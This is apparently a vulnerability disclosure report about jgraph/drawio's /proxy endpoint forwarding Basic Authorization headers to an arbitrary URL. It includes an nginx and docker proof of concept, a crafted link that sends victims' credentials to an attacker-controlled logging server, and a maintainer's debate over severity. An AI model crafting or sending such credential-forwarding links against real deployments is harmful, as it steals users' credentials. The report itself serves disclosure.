Forward credential header to attacker host in jgraph/drawio
Reported on
Jun 14th 2022
Description
Some Admins set the "Authorization" header with the help of a reverse proxy to restrict initial access to the Drawio application server.
In this kind of setup, the "Authorization" header should always be sent to the reverse proxy, and the reverse proxy will forward it to Drawio
But The Problem is in the /proxy endpoint. This Header is redirected to the URL provided to the URL parameter.
The Server receives the "Authorization" header at this line
then the header will be sent to the destination host because of this line
Proof of Concept
Default.conf
server {
listen 80;
auth_basic "Administrators Area";
auth_basic_user_file /etc/nginx/.htpasswd;
location ~ /* {
proxy_pass http://127.0.0.2:8080;
}
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
}
commands ( run in order)
docker run --rm -it -p 127.0.0.2:8080:8080 -p 8443:8443 jgraph/drawio
docker run -d --network host --name nginx-base -p 80:80 nginx:latest
sudo docker cp ./Default.conf nginx-base:/etc/nginx/conf.d/
apt install apache2-utils
htpasswd -c /etc/apache2/.htpasswd user1
# enter a simple password
docker cp /etc/apache2/.htpasswd nginx-base:/etc/nginx/.htpasswd
sudo docker exec nginx-base nginx -s reload
1.Go to your IP/host at port 80
2.Send this URL as an attacker to users: http://Your_IP/proxy?url=A_HTTP_logger_server_Address then look at your HTTP logger server as an attacker server.
3.the "Authorization" header is already forwarded to the attacker server.
Attack summary
The attacker sends the provided link to a user ==> user opens the link ==> user enters the user/pass or user/pass already is cached in browser ==> the "Authorization" header created now ==> this header will send to reverse proxy ==> the reverse proxy forward the header to Drawio /proxy endpoint ==> the proxy endpoint will forward the "Authorization" header to the URL in url parameter
Impact
If we assume that the basic Authorization is already set and these credentials are used for another application on that server, In that case, the attacker, with the help of the /proxy endpoint, can redirect the "Authorization" header to their server and steal the credentials. So definitely, the other applications can be affected by this vulnerability, so the Scope will be changed. Because of the impact on other applications on the same server, we have low Confidentiality and low Integrity impact. Also, the availability of this server can be affected because before this. The application only was available for some particular users.
So I think the 7.1 point is a good score for CVSS.
Occurrences
"Drawio gets the "Authorization" header from users." What authorization are you saying exists in the proxy?
Please provide a full proof of concept, your description is lacking a number of key details. Why would a different application send headers if hosted of on a different port?
Please accept my apologies, I was so tired last night and I missed some things in this report.
I tested it with the provided POC, If I Make a Video POC, please tell me.
I add Attack summary to provide a better path of the attack scenario.
OK, I follow now:
auth_basic "Administrators Area";
auth_basic_user_file /etc/nginx/.htpasswd;
is required, so a vanilla setup won't be subject to this. I rate the complexity as high because of this combined with depending on the authenicated user loading a URL given to them by the attacker
I don't see any justification for any availability effect, either. That requires "reduced performance or reductions in resource availability".
7.1 is too high, that suggests that everyone who has deployed the project needs to update, since it's a high. It's pretty unlikely that anyone's deployment is going to be affected by this, high is too alarmist.